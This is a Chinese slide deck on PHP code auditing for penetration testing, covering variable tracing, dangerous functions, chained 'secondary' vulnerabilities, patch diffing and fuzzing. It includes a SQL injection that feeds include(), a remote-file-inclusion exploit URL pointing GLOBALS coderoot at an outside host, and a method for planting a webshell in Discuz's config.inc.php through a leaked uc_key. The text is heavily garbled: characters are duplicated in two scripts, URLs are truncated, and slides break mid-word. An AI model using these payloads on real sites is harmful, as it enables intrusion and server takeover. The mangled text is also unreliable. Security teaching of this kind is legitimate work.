WEB代碼審計(jì)與滲透測(cè)試

1、WEB代碼審計(jì)與滲透測(cè)試http:/ WEB應(yīng)用程序代碼審計(jì)l程序的兩大根本：變量與函數(shù)l漏洞現(xiàn)成的條件： A、可以控制的變量 【一切輸入都是有害的 】 B、變量到達(dá)有利用價(jià)值的函數(shù)危險(xiǎn)函數(shù) 【一切進(jìn)入函數(shù)的變量是有害的】l漏洞的利用效果取決于最終最終函數(shù)的功能 變量進(jìn)入什么樣的函數(shù)就導(dǎo)致什么要的效果PHP應(yīng)用程序代碼審計(jì)l為什么只是PHP? A、跨平臺(tái)、應(yīng)用廣泛、復(fù)雜 B、變量處理靈活如變量覆蓋、全局變量等 C、函數(shù)庫(kù)巨大 導(dǎo)致漏洞類型多，既有通用的又有特有的 E、代碼審計(jì)的思路是可以通用的變量變量l預(yù)定義變量常規(guī)外部提交的變量 GPC $_ENV/SERVER/SESSION $HTTP_

2、RAW_POST_DATA等lregister_globals = on 未初始化的變量 PHP 4.20 默認(rèn)為offl變量覆蓋未初始化及覆蓋前定義的變量 如：extract() 、遍歷初始化變量、遍歷初始化變量、parse_str()等等l變量的傳遞與存儲(chǔ)中轉(zhuǎn)的變量 存儲(chǔ)于數(shù)據(jù)庫(kù)、文件如配置、緩存文件等危險(xiǎn)函數(shù)l文件包含包含漏洞l代碼執(zhí)行執(zhí)行任意代碼漏洞l命令執(zhí)行執(zhí)行任意命令漏洞l文件系統(tǒng)操作文件(目錄)讀寫等漏洞l數(shù)據(jù)庫(kù)操作SQL注射漏洞l數(shù)據(jù)顯示 XSS等客服端漏洞l更多的變量處理與危險(xiǎn)函數(shù)高級(jí)高級(jí)PHP應(yīng)用程序漏洞審核技術(shù)應(yīng)用程序漏洞審核技術(shù)http:/ 變量跟蹤的過程l通過變量找函

3、數(shù)正向跟蹤變量 $id=$_GETid$sid=$id函數(shù)($sid)l通過函數(shù)找變量逆向跟蹤變量 函數(shù)($sid) $sid=$id $id=$_GETid變量的傳遞與二次漏洞l變量存儲(chǔ)、提取、傳遞是一個(gè)復(fù)雜的立體的過程l過程中經(jīng)過多個(gè)不一樣的函數(shù)的處理后繼續(xù)傳遞，最終達(dá)到漏洞函數(shù)l傳遞的過程中任意環(huán)節(jié)可控就可能導(dǎo)致漏洞l中間函數(shù)處理的過程誕生新的變量，新的變量達(dá)到新的漏洞函數(shù)誕生新的漏洞二次漏洞二次漏洞l 什么是二次漏洞？ 2006年提出的一個(gè)概念 主導(dǎo)思想：通過一個(gè)現(xiàn)有漏洞，創(chuàng)造新的漏洞使得漏洞利用最大化l 一個(gè)demo注意：include與require的區(qū)別二次漏洞l又一個(gè)demo一

4、個(gè)注射漏洞$sql= select id,filepath,user,name from attachment where fileid=$_GETid”; $result = mysql_db_query($dbname, $sql);$file=mysql_fetch_array($result); 然而:include($filefilepath);一個(gè)貌似不可以直接控制的新變量$filefilepath進(jìn)入了危險(xiǎn)函數(shù)include()?id=1 union select 1,http:/ ver遠(yuǎn)程包含漏洞單獨(dú)看上面的代碼是沒有辦法提交 實(shí)現(xiàn)遠(yuǎn)程包含Exp:/admin/index.p

5、hp?_SERVERConfigFile=./commonlib/pages/importcsv.php&GLOBALSassign_invalid_default=1&GLOBALScoderoot=http:/xx.xx.xx.xx/實(shí)現(xiàn)了一次完美的又本地包含轉(zhuǎn)為遠(yuǎn)程包含的又一個(gè)實(shí)例:Discuz!old ver遠(yuǎn)程代碼執(zhí)行漏洞 效果圖：【實(shí)現(xiàn)“給我一個(gè)注射點(diǎn)，我給你一個(gè)shell”的目標(biāo)】注射得到uc_key中.利用uc-key得到webshell代碼執(zhí)行得到webshell的關(guān)鍵在于dz論壇的api借口里：api/uc.php里updateapps()對(duì)配置文件config.inc.p

6、hp有讀寫操作繼續(xù)跟下updateapps()的調(diào)用：$get的處理：整過只要得到了uc_key就可以通過調(diào)用updateapps()對(duì)config.inc.php寫操作了！另外updateapps()的2個(gè)參數(shù)都沒有魔術(shù)引號(hào)的處理：$get = _stripslashes($get);$post = xml_unserialize(file_get_contents(php:/input);數(shù)據(jù)流不受魔術(shù)引號(hào)限制通過$configfile = preg_replace(“/define(UC_API,s*.*?);/i”, “define(UC_API, $UC_API);”, $confi

7、gfile); 閉合define(UC_API, 來注射我們的webshell代碼二次漏洞的啟示l 漏洞的類型是可以轉(zhuǎn)換的:最終的目的是攻擊效果最大化！l 一切進(jìn)入函數(shù)的變量是有害的：變量在傳遞過程任意個(gè)環(huán)節(jié)可控就可能導(dǎo)致漏洞！l 變量傳遞的途徑是多樣的：我們的攻擊思路多元化！ 如對(duì)于dz，去尋找可以找到uc_key的途徑：sql注射、文件讀取config.inc.php里存有uc_key、控制mysql的管理權(quán)限phpmyadmin等等二次漏洞的其他應(yīng)用l應(yīng)用級(jí)別的“rootkit”其他的因素與代碼審計(jì)lphp版本與代碼審計(jì)變量與函數(shù) php.ini默認(rèn)設(shè)置問題 php本身函數(shù)的漏洞php缺

8、少自動(dòng)升級(jí)的機(jī)制l系統(tǒng)特性與系統(tǒng)特性與代碼審計(jì) 包括OS： 主要是文件操作 web服務(wù)器： 主要文件解析類型 系統(tǒng)特性與系統(tǒng)特性與web安全安全 http:/ 甲方的代碼審計(jì): 目的：防御 要求：找到更多的漏洞，并且給出安全補(bǔ)丁建議等。并且對(duì)應(yīng)用程序平臺(tái)無特別要求。 乙方的代碼審計(jì): 目的：滲透也就是進(jìn)攻 要求：找到一個(gè)可用的漏洞就可以，但是要求快速、利用效果最大化等。并且要求在滲透測(cè)試目標(biāo)的平臺(tái)上可以利用。滲透測(cè)試中的代碼審計(jì)代碼審計(jì)前的準(zhǔn)備 A.得到代碼 a.對(duì)于開源的應(yīng)用程序：得到程序的版本信息，越詳細(xì)越好。 *具體應(yīng)用程序版本掃描 b.對(duì)于不開源的應(yīng)用程序： *通過黑盒掃描得到備用文件

9、 *通過黑盒掃描利用sql注射暴代碼loadfile() *通過黑盒掃描利用容易文件下載漏洞 *上一次滲透測(cè)試打包下載的代碼 B.得到平臺(tái)信息 php版本及php.ini一些基本設(shè)置、OS信息、Web服務(wù)信息、數(shù)據(jù)庫(kù)應(yīng)用滲透測(cè)試中的代碼審計(jì)快速代碼審計(jì)： A.補(bǔ)丁對(duì)比技術(shù) B.業(yè)務(wù)功能與漏洞 C.相似性漏洞挖掘 D.基于白盒的fuzz E.常用變量與函數(shù) F.高級(jí)的代碼審計(jì)A 補(bǔ)丁對(duì)比技術(shù)l 二進(jìn)制補(bǔ)丁對(duì)比技術(shù)已經(jīng)非常成熟開始于2004年 ，也誕生了反二進(jìn)制對(duì)比的技術(shù)。l PHP應(yīng)用程序補(bǔ)丁對(duì)比技術(shù) *基于源代碼，對(duì)比起來更加直觀明了 *目前還沒有對(duì)應(yīng)的反對(duì)比機(jī)制 *對(duì)比工具： 系統(tǒng)命令：fc

10、、diff等 專業(yè)工具：Beyond Compare、UltraCompare等 *常見的安全補(bǔ)丁方式： 變量初始化：$str=;、$arr=array();等 變量過濾： intval/int()、addslashes()、正則等 *對(duì)比的版本選擇：選取臨近的版本避免一些非安全補(bǔ)丁的干擾一個(gè)實(shí)例B 業(yè)務(wù)功能與漏洞l 實(shí)現(xiàn)業(yè)務(wù)功能的同時(shí)引入安全風(fēng)險(xiǎn)。如： 上傳功能上傳漏洞 數(shù)據(jù)存儲(chǔ)與查詢sql注射漏洞 后臺(tái)或者api接口安全認(rèn)證繞過 數(shù)據(jù)庫(kù)備用導(dǎo)出webshelll 新的功能必定帶來新的安全隱患。l 功能越強(qiáng)大說明漏洞幾率越大。l 我們?cè)趯徲?jì)代碼的同時(shí)應(yīng)該熟悉應(yīng)用程序的業(yè)務(wù)功能。C 相似性漏洞

11、挖掘l 天下武學(xué)同出少林天大代碼一把抄 最經(jīng)典的故事屬于asp：動(dòng)網(wǎng)的上傳漏洞l 每個(gè)程序員都有自己的代碼風(fēng)格習(xí)慣 不好的風(fēng)格習(xí)慣，可能代碼致命的安全漏洞，而且習(xí)慣很難改變！l 相同的功能帶來同樣的漏洞 如后臺(tái)的功能和api接口實(shí)現(xiàn)相同的功能l 尋找相似性漏洞 *通過補(bǔ)丁對(duì)比技術(shù) *通過漏洞分析、總結(jié)漏洞類型D 基于白盒的fuzz 當(dāng)然也用于其他get、post的變量、甚至是環(huán)境變量，比如注射用戶名、發(fā)帖的標(biāo)題內(nèi)容設(shè)置為一個(gè)特征字符2、對(duì)于數(shù)據(jù)庫(kù)存儲(chǔ)查詢可以讓數(shù)據(jù)庫(kù)出錯(cuò)的字符就行 比如 D 基于白盒的fuzz 的情況下,在inlculdes的文件里設(shè)定的配置變量沒有初始化的問題：那么不是所有的文件都這樣的問題，我們可以先通過白盒找到這些可能出現(xiàn)問題的變量名，然后可以寫個(gè)fuzz的腳本，列表程序目錄一個(gè)